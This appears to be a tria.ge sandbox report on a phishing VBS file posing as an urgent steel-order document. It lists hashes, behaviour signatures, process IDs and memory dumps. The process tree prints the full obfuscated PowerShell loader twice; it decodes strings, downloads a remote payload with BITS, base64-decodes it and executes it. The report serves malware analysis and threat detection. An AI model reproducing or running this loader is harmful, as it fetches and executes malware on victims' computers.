Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

Comanda ur...23.vbs

windows7-x64

1

Comanda ur...23.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    82s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/07/2023, 08:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Comanda urgenta - ITECO STEEL SERVICE 07_03_2023.vbs

  • Size

    4KB

  • MD5

    aab09eea239b96d566b77b1b3958bd23

  • SHA1

    834e6c8da8b1593f166cb48169401a9dbe8a9b5b

  • SHA256

    25a8ad8ccf2a0ad522178a9d5c82b0a56b84e742ff1aa1bc880f745655df2b2a

  • SHA512

    aa6bbcbf66404ed4216e61d0c6eadd93620e2cdce08f0fca33dcdc71a382ac42434bcfef298e7c3b6d4fe641d7ceac2da1c6c2875a52900a9d37ae8753dfebe7

  • SSDEEP

    96:66tOKfIGoKYFTW3dXzOjiAqJn8GGNp8tl81qb3ll4LxURnTlvQg5fEBx:6ZYiKoWtDOWJn8RN6l8cYGRTlvQgK7

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Comanda urgenta - ITECO STEEL SERVICE 07_03_2023.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Bele9 ([String]$Antloph){For($Tillp=4; $Tillp -lt $Antloph.Length-1; $Tillp+=(4+1)){$Echa=$Antloph.Substring( $Tillp, 1);$Gemsef+=$Echa};$Gemsef;}$Rolli112=Bele9 'Ulejh Sart McitDiagpNdvrsDsig:Micr/ Cad/Strad GuioclubmDomsaMartsGren.Stunr AfsoUnca/UnflrSkoleNonfd SemiBarms Kack Coo. Vret Paro BircResi ';$Gemsef01=Bele9 'Epili ArbeRheix Kil ';$Irisrootis175 = Bele9 'Stel\JubisUncoy PresKnivwInquoRetawAfga6Gril4Prog\LabrW KoniFacanDensd RejoSvinwFoehsBurrPPapioTappwOmpoeRammrBullS VarhHysteGrevlMesolCove\XavevBegy1 Frs.Liga0Chon\ Prop PosoContw Tile Krsr SvasFaglh LapeOppelStillbead. SvieAngix Proe Sol ';.($Gemsef01) (Bele9 'Mell$KanaFStete EvemPartvPrivr SubeDigt2Bras=unde$ NoteCycln Morv Mar: DatwRaadi NonnMelddStatiFigur Svi ') ;.($Gemsef01) (Bele9 ' Hec$BereI HavrFilii LeusEjerrSandoDueho SygtForkiVilis Mis1 Hju7kamu5 rer= Gla$HedeF Sube Conm DecvTonerPenneSord2 Fil+asha$AzarI HinrDecii Emps Marr manoTlpeoElekt Anli SessChre1 Uku7 Ove5 Opg ') ;.($Gemsef01) (Bele9 'Degl$ TimN SkeeLanod Oveshist Ove=Aspa Prem(Enge(Skumg Tidw GyrmUncli Beg DefewBanki Crunmega3Nati2Efte_ Nrsp Disr FakoAtomcBoneeAdtrsPodosSkov Hle -TragFfini ParaP BezrJapao DiocSpyde OrgsWhirs DunI kvadOutr=Hype$ Dog{ SwiPKnabIPolyD Kar}Coun)Comm. FilC MadoPappmRabam OmkaPertnProgd TilL Komi Tnkn Ukle Cou)Sand Papi-Unres Coip Serl TagiEndrt scr Ndla[ ovecUnreh Cura PanrHeca]Konf3 Lap4 Kas ');.($Gemsef01) (Bele9 'Atta$ ImmH Date BaalWumbbZebrr Goro Hypd EzaeAdverMilisStep Fre= mes Conv$ EftNDeifefrysd Bedsdian[ Whi$OutsNNegreGaard DynsSori. AntcTilboSachu CarnVatit asc-Hewl2Obad]Syge ');.($Gemsef01) (Bele9 'Peri$ KeiUSpeenOutfdGreneSygerBranh HjsoSvinlCant= Mae(SilkT MineOrigsNdtetDist- NanP Chaa Kret RadhEuph dis$ GenIUdstrFladipiets HjerIzzaoFhovoUndltSandiGaljsEbon1eksp7Indp5 Rin) Ove Inf-ZemiA InnnSkrudBrok Buk(Spar[NyorISynsn Comt EndP nontSererloca]Prun:Ineq:Newss CeriFourzSukkeKlas Broo- NedeCaruq Lae kam8Nonu) Rem ') ;if ($Underhol) {.$Irisrootis175 $Helbroders;} else {;$Gemsef00=Bele9 'TranSTenlt NapaScalr DestFore-TepaBUntui Coxt LicsEkstTPararChecaSussn BamsConsfSupee NabrDumm Lan-psycSUndeo Unpu FlgrGleacParae spr Mimm$ spaRPewio Shol Ensl InfiNorm1Hers1 tav2Emis Pis- AriD ConeFjtesAvistDrapi PaanMensa Myct Ribi bndoUdpnnBogw Hon$PantFLamde BatmviruvSemirskfueFald2Desp ';.($Gemsef01) (Bele9 'ngle$SelvFAfsveAfmemInvevBrugrScroeTorn2Sadd=Macl$ Stae AphnMisfv pse:BracaSvvepBrusp BetdHeloaBandt Oveatelf ') ;.($Gemsef01) (Bele9 'induI VarmRundpYalloVelur SaatDilu- FejMDefeoOperdAstru Ekvl JiveRace KultBUndeiMetat Fins EntTPhysrRingaFrstnOutss Skof Dage TidrUpdo ') ;$Femvre2=$Femvre2+'\Datab.Tre';while (-not $Neofetalu) {.($Gemsef01) (Bele9 'Proc$ NonN klieDrmmoRiftfKanae GeotNedkaMennlDjinu Hvi= cay(ScorT Unpe PepsIrontLand-KnguP GolaUnbatAuthh Uno Eft$ RubFwatce UromTandvCarar ComePota2Circ)Bars ') ;.($Gemsef01) $Gemsef00;.($Gemsef01) (Bele9 ' TerS Bikt GasaMelar fort lac-TyndS StalHydreEpheeCuspp For Lodg5 Sta ');}.($Gemsef01) (Bele9 'Scle$ EjeBBlice FralStriePlur Dipl=Komp StraGBlgeeFrugt Fre-MariC Hulo SornSpalt LreenovanAlist Hag Took$ SpiFEvake Nitm KlovProtrMicre Und2 Hom ');.($Gemsef01) (Bele9 'Pere$PrstB FrarFljmnSkure OptsGeegykoragDaek Samm= Tak Coa[Trn SLninyAtresHypotScateNavnmPseu.SjofCKnopo BrunFljtvCoche TryrHotetConn] dig:Eccr:YurtFindfrMalvoHemimbotcB DonaHjfosStale seq6 ved4 radS PartExperplasi snonIpalg Del(tele$ ThrB Bere Ombl SaieUdtr)Emmy ');.($Gemsef01) (Bele9 ' Pla$dopiG Ille PormDicksCeileElsef Hid2Sylv Pis= Clo Dis[ ImpSHaenyDists Roct udveAntimgene.FunkTAbbreAntixDoortBrom.FamiEStann Parc Domo Lard Ssti ImpnAquag Sam]Brug:Jock: DerAMaxiSSicyCBambIBhutIGenn.WairGInveeRingt dioS TiltSignr Vani BinnLeucg Syv( cla$OuabBbeeprFrstnKnobeCornsRespy FesgGrin) Joa ');.($Gemsef01) (Bele9 'Acad$ fdsM LifoZoopt Dumi OpsvDraa=Ernr$ OokGFanae FebmUnjesPyloeRettf Kan2 Aed. Rhos Stvu Effb GamsAutot ProrArbeiPersnraing Dyn( Ops2Nond0 Tra0 Amn7Wahc0 Gra8Boli, Pto2 Udb7Oppu3 Par6Fors3Jinn)Chal ');.($Gemsef01) $Motiv;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1420
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Bele9 ([String]$Antloph){For($Tillp=4; $Tillp -lt $Antloph.Length-1; $Tillp+=(4+1)){$Echa=$Antloph.Substring( $Tillp, 1);$Gemsef+=$Echa};$Gemsef;}$Rolli112=Bele9 'Ulejh Sart McitDiagpNdvrsDsig:Micr/ Cad/Strad GuioclubmDomsaMartsGren.Stunr AfsoUnca/UnflrSkoleNonfd SemiBarms Kack Coo. Vret Paro BircResi ';$Gemsef01=Bele9 'Epili ArbeRheix Kil ';$Irisrootis175 = Bele9 'Stel\JubisUncoy PresKnivwInquoRetawAfga6Gril4Prog\LabrW KoniFacanDensd RejoSvinwFoehsBurrPPapioTappwOmpoeRammrBullS VarhHysteGrevlMesolCove\XavevBegy1 Frs.Liga0Chon\ Prop PosoContw Tile Krsr SvasFaglh LapeOppelStillbead. SvieAngix Proe Sol ';.($Gemsef01) (Bele9 'Mell$KanaFStete EvemPartvPrivr SubeDigt2Bras=unde$ NoteCycln Morv Mar: DatwRaadi NonnMelddStatiFigur Svi ') ;.($Gemsef01) (Bele9 ' Hec$BereI HavrFilii LeusEjerrSandoDueho SygtForkiVilis Mis1 Hju7kamu5 rer= Gla$HedeF Sube Conm DecvTonerPenneSord2 Fil+asha$AzarI HinrDecii Emps Marr manoTlpeoElekt Anli SessChre1 Uku7 Ove5 Opg ') ;.($Gemsef01) (Bele9 'Degl$ TimN SkeeLanod Oveshist Ove=Aspa Prem(Enge(Skumg Tidw GyrmUncli Beg DefewBanki Crunmega3Nati2Efte_ Nrsp Disr FakoAtomcBoneeAdtrsPodosSkov Hle -TragFfini ParaP BezrJapao DiocSpyde OrgsWhirs DunI kvadOutr=Hype$ Dog{ SwiPKnabIPolyD Kar}Coun)Comm. FilC MadoPappmRabam OmkaPertnProgd TilL Komi Tnkn Ukle Cou)Sand Papi-Unres Coip Serl TagiEndrt scr Ndla[ ovecUnreh Cura PanrHeca]Konf3 Lap4 Kas ');.($Gemsef01) (Bele9 'Atta$ ImmH Date BaalWumbbZebrr Goro Hypd EzaeAdverMilisStep Fre= mes Conv$ EftNDeifefrysd Bedsdian[ Whi$OutsNNegreGaard DynsSori. AntcTilboSachu CarnVatit asc-Hewl2Obad]Syge ');.($Gemsef01) (Bele9 'Peri$ KeiUSpeenOutfdGreneSygerBranh HjsoSvinlCant= Mae(SilkT MineOrigsNdtetDist- NanP Chaa Kret RadhEuph dis$ GenIUdstrFladipiets HjerIzzaoFhovoUndltSandiGaljsEbon1eksp7Indp5 Rin) Ove Inf-ZemiA InnnSkrudBrok Buk(Spar[NyorISynsn Comt EndP nontSererloca]Prun:Ineq:Newss CeriFourzSukkeKlas Broo- NedeCaruq Lae kam8Nonu) Rem ') ;if ($Underhol) {.$Irisrootis175 $Helbroders;} else {;$Gemsef00=Bele9 'TranSTenlt NapaScalr DestFore-TepaBUntui Coxt LicsEkstTPararChecaSussn BamsConsfSupee NabrDumm Lan-psycSUndeo Unpu FlgrGleacParae spr Mimm$ spaRPewio Shol Ensl InfiNorm1Hers1 tav2Emis Pis- AriD ConeFjtesAvistDrapi PaanMensa Myct Ribi bndoUdpnnBogw Hon$PantFLamde BatmviruvSemirskfueFald2Desp ';.($Gemsef01) (Bele9 'ngle$SelvFAfsveAfmemInvevBrugrScroeTorn2Sadd=Macl$ Stae AphnMisfv pse:BracaSvvepBrusp BetdHeloaBandt Oveatelf ') ;.($Gemsef01) (Bele9 'induI VarmRundpYalloVelur SaatDilu- FejMDefeoOperdAstru Ekvl JiveRace KultBUndeiMetat Fins EntTPhysrRingaFrstnOutss Skof Dage TidrUpdo ') ;$Femvre2=$Femvre2+'\Datab.Tre';while (-not $Neofetalu) {.($Gemsef01) (Bele9 'Proc$ NonN klieDrmmoRiftfKanae GeotNedkaMennlDjinu Hvi= cay(ScorT Unpe PepsIrontLand-KnguP GolaUnbatAuthh Uno Eft$ RubFwatce UromTandvCarar ComePota2Circ)Bars ') ;.($Gemsef01) $Gemsef00;.($Gemsef01) (Bele9 ' TerS Bikt GasaMelar fort lac-TyndS StalHydreEpheeCuspp For Lodg5 Sta ');}.($Gemsef01) (Bele9 'Scle$ EjeBBlice FralStriePlur Dipl=Komp StraGBlgeeFrugt Fre-MariC Hulo SornSpalt LreenovanAlist Hag Took$ SpiFEvake Nitm KlovProtrMicre Und2 Hom ');.($Gemsef01) (Bele9 'Pere$PrstB FrarFljmnSkure OptsGeegykoragDaek Samm= Tak Coa[Trn SLninyAtresHypotScateNavnmPseu.SjofCKnopo BrunFljtvCoche TryrHotetConn] dig:Eccr:YurtFindfrMalvoHemimbotcB DonaHjfosStale seq6 ved4 radS PartExperplasi snonIpalg Del(tele$ ThrB Bere Ombl SaieUdtr)Emmy ');.($Gemsef01) (Bele9 ' Pla$dopiG Ille PormDicksCeileElsef Hid2Sylv Pis= Clo Dis[ ImpSHaenyDists Roct udveAntimgene.FunkTAbbreAntixDoortBrom.FamiEStann Parc Domo Lard Ssti ImpnAquag Sam]Brug:Jock: DerAMaxiSSicyCBambIBhutIGenn.WairGInveeRingt dioS TiltSignr Vani BinnLeucg Syv( cla$OuabBbeeprFrstnKnobeCornsRespy FesgGrin) Joa ');.($Gemsef01) (Bele9 'Acad$ fdsM LifoZoopt Dumi OpsvDraa=Ernr$ OokGFanae FebmUnjesPyloeRettf Kan2 Aed. Rhos Stvu Effb GamsAutot ProrArbeiPersnraing Dyn( Ops2Nond0 Tra0 Amn7Wahc0 Gra8Boli, Pto2 Udb7Oppu3 Par6Fors3Jinn)Chal ');.($Gemsef01) $Motiv;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4740

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1solrkwj.0jc.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1420-171-0x000001A46A790000-0x000001A46A7A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1420-139-0x000001A46A790000-0x000001A46A7A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1420-140-0x000001A46A790000-0x000001A46A7A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1420-145-0x000001A46A790000-0x000001A46A7A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1420-172-0x000001A46A790000-0x000001A46A7A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1420-170-0x000001A46A790000-0x000001A46A7A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1420-133-0x000001A46A750000-0x000001A46A772000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4740-148-0x00000000047B0000-0x00000000047C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4740-167-0x0000000006F40000-0x0000000006F62000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4740-151-0x0000000005670000-0x00000000056D6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4740-152-0x0000000005750000-0x00000000057B6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4740-162-0x0000000005D60000-0x0000000005D7E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4740-163-0x00000000047B0000-0x00000000047C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4740-164-0x0000000007590000-0x0000000007C0A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4740-165-0x0000000006310000-0x000000000632A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4740-166-0x0000000006FB0000-0x0000000007046000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4740-150-0x00000000054D0000-0x00000000054F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4740-168-0x00000000081C0000-0x0000000008764000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4740-169-0x0000000007390000-0x00000000073A4000-memory.dmp

    Filesize

    80KB

    Download

  • memory/4740-149-0x00000000047B0000-0x00000000047C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4740-147-0x0000000004E30000-0x0000000005458000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4740-146-0x00000000047C0000-0x00000000047F6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4740-173-0x00000000047B0000-0x00000000047C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4740-174-0x00000000047B0000-0x00000000047C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4740-175-0x00000000047B0000-0x00000000047C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4740-178-0x0000000007430000-0x0000000007431000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4740-177-0x0000000008770000-0x000000000D890000-memory.dmp

    Filesize

    81.1MB

    Download